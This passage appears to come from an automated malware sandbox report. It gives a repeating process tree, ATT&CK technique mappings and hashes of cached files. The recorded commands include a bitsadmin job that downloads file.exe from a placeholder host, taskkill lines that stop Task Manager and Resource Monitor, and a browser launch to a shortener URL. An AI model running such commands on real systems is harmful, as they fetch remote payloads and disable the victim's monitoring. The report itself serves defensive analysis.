        PID:1876
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2120
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2640
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:2916
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2584
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:1808
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2756
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:1996
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:2320
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2920
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:936
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2004
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        
        PID:328
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:2064
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:1552
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:904
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:2776
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        
        PID:1956
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2044
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:1448
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2444
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:2084
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2876
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2556
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1688
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:1628
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        
        PID:2468
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2308
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2464
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:884
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2452
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2784
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2608
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:2292
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        
        PID:2392
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2052
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:844
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2920
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1676
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2224
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:328
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1652
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:1500
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:908
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2440
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:1108
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2820
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:952
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:1692
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2236
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2728
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:304
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        
        PID:2184
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2600
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2568
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:1876
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2996
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        
        PID:820
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2620
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:1612
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        
        PID:2784
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2032
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:1784
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:824
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        
        PID:2688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:884
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2448
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2120
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:2284
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:328
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:1812
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2488
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2036
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        
        PID:2108
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2388
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2100
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1528
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:1156
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        
        PID:2952
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:1680
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:440
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1600
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:2852
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:1984
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:1952
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2956
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:1864
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        
        PID:2512
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:1640
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2024
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2432
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:1800
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:1604
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:884
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:740
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:2676
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:908
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:1136
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2444
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:2912
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2244
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:904
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1828
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:2612
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        
        PID:1244
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2964
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:1628
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1528
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        
        PID:3004
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:2488
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:1824
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2808
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        
        PID:1548
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:1952
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:368
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2620
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:296
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:1740
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        
        PID:1704
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2328
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:2532
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:1292
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2324
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2284
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2844
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        
        PID:1780
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:1160
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2232
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1596
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:1708
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        
        PID:1692
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2424
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2468
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        
        PID:896
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:684
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        
        PID:1628

C:\Windows\system32\cmd.exe
cmd /c ""C:\online.bat" "
1⤵
PID:3068
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://iplis.ru/RNru4
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:1600
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1600 CREDAT:275457 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:3052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
1KB

MD5
a2bfb0215f4f54f36a0cad1dd2d1ff24

SHA1
1d16887834af6400a55343d6ed06effa5d3d46ce

SHA256
da1aae5611f87afcddd30f5b39583e721adc5a08db4867dd2efc8557b4902d66

SHA512
5553819df614987204eeb1ea6258d59ff26303e07f5ac057e8db3a94df74292aaba41b09489921ba68ff0e46cba24d3541d9751314622a0b69dbd7b313447fee

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
408B

MD5
653157a1f36dd630145decb46b92f576

SHA1
5d2dbffc60723864749b0de1540ecfed602db537

SHA256
1078574278cecbe3c8ee28854d7446b7bc7b3a4768f9fbfa6fbf9c9d87eeb53f

SHA512
3418a777c48c02a6b75cb584522d403c4a2960c939a641ab76f3cea52ce5d96e4ed4f0954c5d238dfd139c37e956992b19e670ed195f66493bdca2f932bba81d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7caad96aacdc3be8c82b4a06b4c19492

SHA1
f239c9fbf8304ae4b8a241a9dfa54a09b188b433

SHA256
b598833716609fcd2dff58209f9dea265e9238ccd6078feaff756300ec263e44

SHA512
54cfec763fa124ae58d9f3ceeecd01e291dc94738cd9aaac532d8d281a3410e7d4ce7a0f5b999753c67a504e5fcc6e7625c67e1270380976bcc6cac7d8bedb44

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e28a221133c245c4bea0e9b9d87a7d5e

SHA1
c090666dcb35aada6a8e54232cd9d533228e5e7a

SHA256
5176feec88f595a56353159cbc549ad7864edfbce0f701e3fe9445d47a6be025

SHA512
2d2bf4063361ca71ba532b743ffd5de037348b3d641cb64565e9f998ccde6c82b4bd4bb9446d7ef4525f132c245f61cbe3e4171b6820275db7da22f747b29a3d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
cf33fc3536523aa1cc8526e6d4aee04c

SHA1
986f15a88651412fc938fcdd3c7812b38993425e

SHA256
13e746646d9be983bd28d692fd86a36d517f3aeb97df9f9270fec154614a1ba7

SHA512
54621d1c32c21f36025521a568d32603310d8d7881d28e16e52a3290120816287ec931b0cfa1fb312a9936535349bc4aa1c34abe98792bed57bea50c8043b1fa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
44fe6dc2baf20216563029a80ba6f800

SHA1
1ec460abe2de5a9f8fbc5596f2567368bc30008a

SHA256
9ce0b566df304b67098968dc6d81ba9e369f411804e595e1fa394598337f5a5e

SHA512
0248718be1d13aa4d9e7b8b11e2a86fd0ab6bcf018fd6d3fdc69ce19a398dbadc2d69b083040733b48a2a7fb5b6ba538c0fb8f94d029a90d8c7ebc98aee984f9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
0e56162b253cd871de6168ff7d626e0a

SHA1
b3fd0352cc799fa5d38df692d4beac97aa26b45a

SHA256
009ab3f5eecf2aa89c8813a30feec2d951cf8f96c6561d4fb9bf30ad2a83b028

SHA512
6c5416be72b4efadc1d20e0df7335b3e6085e08cc611a9f7e80b3469d9b71c5f60c52a649b4c7e620697c55f1b33ebbe8018f0394aa49d4e36e116c79773629b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
cee3c2a7256965f9ffa023171801751b

SHA1
f30e80430f84c0c84eec9f316cfd5cac5e44938f

SHA256
67305870f2cbb9b238c6f14abb28dc7f4c9920f7a58ac248be1f813a41665cab

SHA512
b56cc6a95a5a388e1ab368b6ec7e206a2a21678af12593b179fb3b321f6526ec06ff7e1cb29f429e1bc5c019a4a72f0405ec489f57dc78da9dc6bc69fe4ffe37

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
23b88ad2d703675044f0be1a075b4446

SHA1
3f25e3e09c111f606c6884af0b0827009c694abc

SHA256
b5590d10a8c09d780545006e4c9b1ab36e5fa22aed1e1645707e1cfddb7982ac

SHA512
6ae3609147ad9c56c88b6a2aa666d1802ce87d3afc867dd3f5e0ff67aa4c8c8d33bcc11601a928769f96d55f5ae734e44c5c1bf976279386c02c4ef7f71456de

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e48ec331db8ff94a83006ed93384d44a

SHA1
bb89f1077a5acc730e28e63f8333bd10479fadf1

SHA256
b7404dde9708e3f8ae496b445296dc7acbd364111ace9f7454dbf36516202f89

SHA512
c5deaa171c21da67ac869db470ea95a7ffd0ea3a7e5f087efc4eb2ceb68965daf26c6b870ea5af4c204e50d19856f3cc25decc909d7414ec04d46d2993846948

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
2bbee2928f20246f0125350e914aff94

SHA1
c21a3810e28968b49d38e6d82579b2ec6ee44d99

SHA256
49fa0aa3d7f0e52e6040002de499a898937d2135fed73f525400628b296be306

SHA512
e035fe6855cf89b5ed16ce0f1a78a1ee44f658b27988263daa9892cf701c232122160cdeb6e36f6f4b0d384a29289ec27a345fc93152ab47bcdab7a55597d114

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d8060926974a7cae54e6e2b953190b29

SHA1
46b9bd4a3b13be12999c2bc9e6ec5a407b8e89b7

SHA256
513381614b57efa4db8c616301f15bb2e0c9939e5c6a68dd56919128b89d78ea

SHA512
76db6e6f08fdc120c11788546a71281a3c3bd6ed1a853380f75b0d3c5cb57002ff3b7b659d02114dc2529fa8399e65292fa5555e7f6aa5b29049ad9580aa5821

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
fd07d76acfe1656e1c290542a18906c6

SHA1
43038fa90cb1eb210891b4642fa2ff63aa39f390

SHA256
4015c3d72bac9abcf77e6f2a7700df198cb97fdf17fbbe7abfd493b88bc86483

SHA512
63ba13e4b23eb4f195d55fd56378e99aee291f8584eed6adf9973a278ee457bf4aab1cef64f2289534f3cd5c2a3d35dcd6296768331f5a07943f0618ca709183

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
2357bc2a78c6df790589f1bb197d1e41

SHA1
a91fa6c2eed1b6687a8a124bbdc768dc866c9ec1

SHA256
94b4ebb4a8fc40b2160d8398f42d6fdd8c465b00027de1455046c2ae30eb220e

SHA512
